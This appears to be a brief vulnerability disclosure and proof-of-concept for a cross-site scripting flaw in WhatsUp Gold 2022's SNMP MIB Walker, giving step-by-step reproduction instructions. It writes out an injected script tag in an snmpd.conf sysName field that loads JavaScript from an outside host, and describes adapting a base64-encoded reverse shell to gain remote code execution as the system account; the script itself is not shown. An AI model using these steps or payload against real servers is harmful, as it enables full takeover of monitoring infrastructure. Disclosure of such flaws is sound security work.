Whats Up Gold 2022

< v. 22.1.0


Improper validation of strings from SNMP devices when using the SNMP MIB Walker, makes the application prone to a reflected XXS attack.

Steps To Reproduce:

  1. Place a XSS payload in the SNMPD.conf on a Linux computer. Have the payload open a javascript file hosted on a HTTPS webserver (Because WhatsUpGold uses HTTPS, you cannot link to a HTTP webserver). SNMP walk the Linux computers IP.
  2. Modify script below to run revshell. You can de-base my payload and change IP and port, then base64 encode again and put it in script. Or run another payload of course.
  3. Save the script on a webserver
  4. Add XSS pointing at url of script in SNMPD config, I placed it in sysName:
    sysContact Me <me@example.org>
    sysLocation Home
    sysName LinuxPC<script src='https://f20.be/t.js'/>
  5. Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer


Function of script


The attacker will have Remote Code Execution as the "NT System" account. Full control of the server.

POC Video